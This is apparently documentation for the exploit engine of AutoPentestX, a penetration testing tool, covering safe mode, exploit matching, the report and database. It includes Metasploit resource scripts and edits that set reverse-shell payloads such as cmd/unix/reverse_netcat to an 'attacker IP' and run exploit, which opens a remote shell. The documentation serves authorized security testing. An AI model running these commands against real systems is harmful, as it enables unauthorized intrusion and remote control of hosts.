AutoPentestX includes an intelligent exploitation engine that matches discovered vulnerabilities with known exploits and generates Metasploit resource scripts for manual testing.
Safe Mode is ALWAYS enabled by default. AutoPentestX simulates exploitation attempts but never executes actual exploits to prevent system damage.
How Exploit Matching Works
The exploit engine analyzes vulnerabilities from two sources:
Service-based matching: Vulnerable service versions detected by Nmap
CVE-based matching: Known CVEs from the intelligence database
Exploitation Phases
Vulnerability Input
The engine receives vulnerability data from Phase 3 and Phase 4:
# From main.py:264-268
matched_exploits = exploit_engine.match_exploits(
    self.vuln_results.get('vulnerabilities', []),
    self.cve_results
)
Exploit Database Lookup
Vulnerabilities are matched against the internal exploit database:
# From modules/exploit_engine.py:22-53
self.exploit_db = {
    'vsftpd 2.3.4': {
        'name': 'vsftpd_234_backdoor',
        'module': 'exploit/unix/ftp/vsftpd_234_backdoor',
        'description': 'VSFTPD v2.3.4 Backdoor Command Execution',
        'safe': True
    },
    'EternalBlue': {
        'name': 'ms17_010_eternalblue',
        'module': 'exploit/windows/smb/ms17_010_eternalblue',
        'description': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
        'safe': False  # Potentially destructive
    }
    # ... more exploits
}
Confidence Scoring
Each match receives a confidence level:
HIGH: Exact service version match
MEDIUM: CVE-based match
LOW: Generic service match
Safe Mode Check
Before simulation, the engine verifies each exploit’s safety rating:
# From modules/exploit_engine.py:211-219
if not exploit.get('safe', False) and self.safe_mode:
    print(f"[!] Skipping potentially dangerous exploit: {exploit['name']}")
    result = {
        'status': 'SKIPPED',
        'reason': 'Exploit marked as potentially destructive'
    }
Simulation & RC Script Generation
For safe exploits, Metasploit resource scripts are generated:
[✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_21_20240311_143022.rc
Built-in Exploit Database
AutoPentestX includes exploits for common vulnerabilities:
FTP Exploits
VSFTPD 2.3.4 Backdoor
Metasploit Module: exploit/unix/ftp/vsftpd_234_backdoor
Description: VSFTPD version 2.3.4 contains a backdoor allowing remote code execution.
Trigger Conditions:
Service: ftp
Version: vsftpd 2.3.4
Safety Rating: ✅ Safe (opens a shell but doesn’t crash the service)
ProFTPD 1.3.3c Backdoor
Metasploit Module: exploit/unix/ftp/proftpd_133c_backdoor
Description: ProFTPD 1.3.3c backdoor allows remote command execution.
Trigger Conditions:
Service: ftp
Version: proftpd 1.3.3
Safety Rating: ✅ Safe
SMB Exploits
EternalBlue (MS17-010)
Metasploit Module: exploit/windows/smb/ms17_010_eternalblue
CVE: CVE-2017-0144
Description: Remote code execution in Windows SMB server (WannaCry vulnerability).
Trigger Conditions:
CVE-2017-0144 detected
Port 445 (SMB) open
Windows operating system
Safety Rating: ⚠️ Potentially Destructive (can crash systems)
EternalBlue is automatically SKIPPED in safe mode because it may cause system crashes.
Web Exploits
Shellshock (Bash Environment Variable)
Metasploit Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
CVE: CVE-2014-6271
Description: Remote code execution through bash environment variable injection.
Trigger Conditions:
CVE-2014-6271 detected
Apache with mod_cgi detected
Safety Rating: ✅ Safe
Drupalgeddon2
Metasploit Module: exploit/unix/webapp/drupal_drupalgeddon2
CVE: CVE-2018-7600
Description: Drupal remote code execution via form API.
Trigger Conditions:
CVE-2018-7600 detected
Drupal CMS identified
Safety Rating: ✅ Safe
Console Output Interpretation
Phase 6: Exploitation Assessment
╔══════════════════════════════════════════════════════════════════╗
║ [PHASE 6] ▶ Exploit simulation [SAFE MODE]... ║
╚══════════════════════════════════════════════════════════════════╝
──────────────────────────────────────────────────────────────────
[✓] Metasploit Framework detected
============================================================
AutoPentestX - Exploit Matching
============================================================
[✓] Exploit matched: vsftpd_234_backdoor for port 21
[✓] Exploit matched: ms17_010_eternalblue for CVE CVE-2017-0144
[*] Total exploits matched: 2
============================================================
AutoPentestX - Exploitation Simulation
============================================================
Safe Mode: ENABLED
Target: 192.168.1.100
============================================================
[*] Running in SAFE MODE - No actual exploitation will occur
[*] Generating exploit feasibility reports...
[*] Simulating exploit: exploit/unix/ftp/vsftpd_234_backdoor
Target: 192.168.1.100:21
Payload: generic/shell_reverse_tcp
[✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_21_20240311_143022.rc
[*] Port 21: vsftpd_234_backdoor - SIMULATED
[!] Skipping potentially dangerous exploit: ms17_010_eternalblue
[*] Port 445: ms17_010_eternalblue - SKIPPED
============================================================
EXPLOITATION SUMMARY
============================================================
Exploits matched: 2
Exploits simulated: 2
Safe mode: ENABLED
============================================================
[i] Note: All exploitation was simulated only.
[i] RC scripts generated for manual testing if needed.
Status Meanings
SIMULATED: Exploit was deemed safe and an RC script was generated. You can manually test this exploit using Metasploit.
SKIPPED: Exploit was flagged as potentially destructive and was not simulated, even in safe mode.
BLOCKED: Safe mode prevented execution (this status appears if --no-safe-mode is used, but exploitation is still blocked).
RC scripts are saved to the exploits/ directory and can be used for manual exploitation.
RC Script Structure
exploits/exploit_192.168.1.100_21_20240311_143022.rc
# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:21
# Date: 2026-03-11 14:30:22
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
set RPORT 21
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
check
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
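A pre-load check for scripts with the structure shown above, added here as an example (it is not part of AutoPentestX): it confirms that a script still only runs check and that every RHOSTS value sits inside the authorized scope. The function name lint_rc, the scope list and the abbreviated sample scripts are assumptions constructed for illustration.

```python
import ipaddress

# msfconsole commands that launch a module instead of only probing it.
LAUNCH_COMMANDS = {"exploit", "run", "rexploit", "rerun"}

def lint_rc(text, authorized_cidrs):
    """Return a list of (line_number, message) findings for one RC script."""
    scope = [ipaddress.ip_network(c) for c in authorized_cidrs]
    findings, has_check, in_ruby = [], False, False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if in_ruby:                      # skip the body of a <ruby> block
            in_ruby = line != "</ruby>"
            continue
        if line == "<ruby>":
            in_ruby = True
            findings.append((lineno, "embedded <ruby> block, review by hand"))
            continue
        if not line or line.startswith("#"):
            continue                     # commented-out commands never run
        tokens = line.split()
        cmd = tokens[0].lower()
        if cmd in LAUNCH_COMMANDS:
            findings.append((lineno, f"active launch command: {cmd}"))
        elif cmd == "check":
            has_check = True
        elif cmd in ("set", "setg") and len(tokens) >= 3 and tokens[1].upper() == "RHOSTS":
            for target in tokens[2:]:
                try:
                    net = ipaddress.ip_network(target, strict=False)
                except ValueError:
                    findings.append((lineno, f"RHOSTS value not an IP/CIDR: {target}"))
                    continue
                if not any(net.version == s.version and net.subnet_of(s) for s in scope):
                    findings.append((lineno, f"RHOSTS outside authorized scope: {target}"))
    if not has_check:
        findings.append((0, "no check command present"))
    return findings

# Constructed samples: an abbreviated generated script and an edited copy of it.
GENERATED = """\
# Metasploit Resource Script
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
set RPORT 21
check
# Uncomment to execute: exploit
"""
EDITED = GENERATED.replace("192.168.1.100", "10.9.9.9") + "exploit\n"
```

An empty result means the script is check-only and in scope; the edited copy is flagged on the retargeted RHOSTS line and on the uncommented exploit line.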
Load the RC Script
Use the resource command to load the script:
msf6 > resource exploits/exploit_192.168.1.100_21_20240311_143022.rc
The script will:
Load the exploit module
Configure all parameters
Run the check command to verify exploitability
Review Check Results
Metasploit’s check command tests if the target is vulnerable:
[*] 192.168.1.100:21 - The target appears to be vulnerable.
or
[*] 192.168.1.100:21 - The target is not exploitable.
Manual Exploitation (Optional)
If you have authorization and want to proceed:
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.100:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.100:21 - Sending malicious packet...
[*] Command shell session 1 opened
Only execute exploits with explicit written authorization. Exploitation can crash services or damage systems.
Customizing RC Scripts
You can edit RC scripts before running them:
# Change the listening port
set LPORT 8888
# Use a different payload
set PAYLOAD cmd/unix/reverse_netcat
# Set your attacker IP
set LHOST 10.0.0.5
# Add exploit options
set VERBOSE true
exploit
Safe Mode vs No-Safe-Mode
Default Behavior (Safe Mode)
python3 main.py -t 192.168.1.100
What Happens:
✅ Identifies exploitable vulnerabilities
✅ Matches exploits from database
✅ Generates Metasploit RC scripts
✅ Runs check command simulation
❌ Does NOT execute exploits
❌ Does NOT modify target system
❌ Does NOT open reverse shells
Output:
[*] Running in SAFE MODE - No actual exploitation will occur
[*] Simulating exploit: exploit/unix/ftp/vsftpd_234_backdoor
Target: 192.168.1.100:21
Payload: generic/shell_reverse_tcp
[✓] Metasploit RC script saved
Disabling Safe Mode
python3 main.py -t 192.168.1.100 --no-safe-mode
Currently Blocked: Even with --no-safe-mode, actual exploitation is disabled in the code for safety. This is an intentional design decision.
What Would Happen (if enabled):
⚠️ Could execute actual exploits
⚠️ May crash services
⚠️ Could damage target systems
⚠️ Might trigger IDS/IPS alerts
⚠️ Legal liability if unauthorized
Code Protection:
From modules/exploit_engine.py:127-132:
if not self.safe_mode:
    print("[!] WARNING: Safe mode disabled - This could cause system damage!")
    return {
        'status': 'BLOCKED',
        'reason': 'Exploitation disabled for safety'
    }
Skipping Exploitation Phase
Use --skip-exploit to disable the entire exploitation phase:
python3 main.py -t 192.168.1.100 --skip-exploit
Impact:
Phase 6 is skipped entirely
No exploit matching occurs
No RC scripts are generated
Reduces scan time by 2-5 minutes
Report shows 0 exploitation attempts
Console Output:
[PHASE 6] Exploitation assessment... [SKIPPED BY OPERATOR]
When to Skip:
✅ Pure vulnerability discovery
✅ Compliance scanning
✅ Time-constrained assessments
✅ When Metasploit is not installed
Exploitation in PDF Report
The report includes an “EXPLOITATION ASSESSMENT” section:
Section Content
EXPLOITATION ASSESSMENT
The following exploitation scenarios were evaluated in SAFE MODE.
No actual exploitation was performed to prevent system damage.
Total Exploits Identified: 2
• Port 21: vsftpd_234_backdoor
Status: SIMULATED
Description: VSFTPD v2.3.4 Backdoor Command Execution
• Port 445: ms17_010_eternalblue
Status: SKIPPED
Description: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Reason: Exploit marked as potentially destructive
Interpreting Results
Meaning: Exploit is available and an RC script was generated.
Action Items:
Review the RC script in exploits/ directory
Test in a lab environment first
If authorized, manually execute using Metasploit
Document findings
Meaning: Exploit exists but is flagged as dangerous.
Action Items:
Investigate the CVE manually
Check vendor patches
Test in an isolated lab only
Do NOT attempt on production systems
Meaning: No known exploits for detected vulnerabilities.
Action Items:
Vulnerabilities still exist (lack of exploit ≠ lack of risk)
Review CVE details for manual testing approaches
Check vendor advisories
Apply patches based on vulnerability severity
After AutoPentestX generates RC scripts, follow this workflow for manual testing:
Step 1: List Generated Scripts
Step 2: Review Script Content
Step 3: Start Metasploit
Step 4: Load Script
Step 5: Verify Configuration
Step 6: Check Exploitability
Step 7: Execute (if authorized)
Database Storage
Exploit attempts are stored in the database:
CREATE TABLE exploits (
    id INTEGER PRIMARY KEY,
    scan_id INTEGER,
    vulnerability_id INTEGER,
    name TEXT,
    status TEXT,          -- 'SIMULATED', 'SKIPPED', 'BLOCKED'
    result TEXT,          -- JSON with details
    created_at TIMESTAMP
);
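An audit over the table above, added here as an example (it is not AutoPentestX code): it counts statuses for one scan and flags rows whose status is outside the three documented values, or whose SKIPPED/BLOCKED result carries no reason. The reason key inside the result JSON, the function names and the sample rows are assumptions constructed for illustration.

```python
import json
import sqlite3

EXPECTED = {"SIMULATED", "SKIPPED", "BLOCKED"}  # statuses named in the schema comment

SCHEMA = """CREATE TABLE exploits (
    id INTEGER PRIMARY KEY, scan_id INTEGER, vulnerability_id INTEGER,
    name TEXT, status TEXT, result TEXT, created_at TIMESTAMP)"""

def audit_scan(conn, scan_id):
    """Return (status_counts, anomalies) for one scan."""
    counts, anomalies = {}, []
    rows = conn.execute(
        "SELECT id, name, status, result FROM exploits WHERE scan_id = ? ORDER BY id",
        (scan_id,))
    for row_id, name, status, result in rows:
        counts[status] = counts.get(status, 0) + 1
        if status not in EXPECTED:
            anomalies.append((row_id, name, f"unexpected status {status!r}"))
            continue
        try:
            detail = json.loads(result or "{}")
        except json.JSONDecodeError:
            anomalies.append((row_id, name, "result is not valid JSON"))
            continue
        has_reason = isinstance(detail, dict) and bool(detail.get("reason"))
        if status != "SIMULATED" and not has_reason:
            anomalies.append((row_id, name, f"{status} without a recorded reason"))
    return counts, anomalies

def demo_db():
    """In-memory database with constructed rows (not real scan data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    rows = [
        (1, 1, 10, "vsftpd_234_backdoor", "SIMULATED", '{"status": "SIMULATED"}'),
        (2, 1, 11, "ms17_010_eternalblue", "SKIPPED",
         '{"reason": "Exploit marked as potentially destructive"}'),
        (3, 1, 12, "example_module", "EXECUTED", "{}"),  # constructed anomaly
        (4, 1, 13, "example_module", "BLOCKED", "{}"),   # reason missing
    ]
    conn.executemany(
        "INSERT INTO exploits VALUES (?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)", rows)
    return conn
```

Calling audit_scan(demo_db(), 1) returns the per-status counts together with the two constructed anomalies.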
Query Exploitation Data
sqlite3 database/autopentestx.db \
"SELECT name, status FROM exploits WHERE scan_id = 1;"
Best Practices
Always Get Authorization: Never attempt exploitation without explicit written permission, even in safe mode.
Test in Labs First: Use Metasploitable, DVWA, or other vulnerable VMs for practice before testing real systems.
Keep Safe Mode Enabled: Only disable safe mode if you’re an expert and have proper authorization.
Document Everything: Keep detailed records of all exploitation attempts and results for legal protection.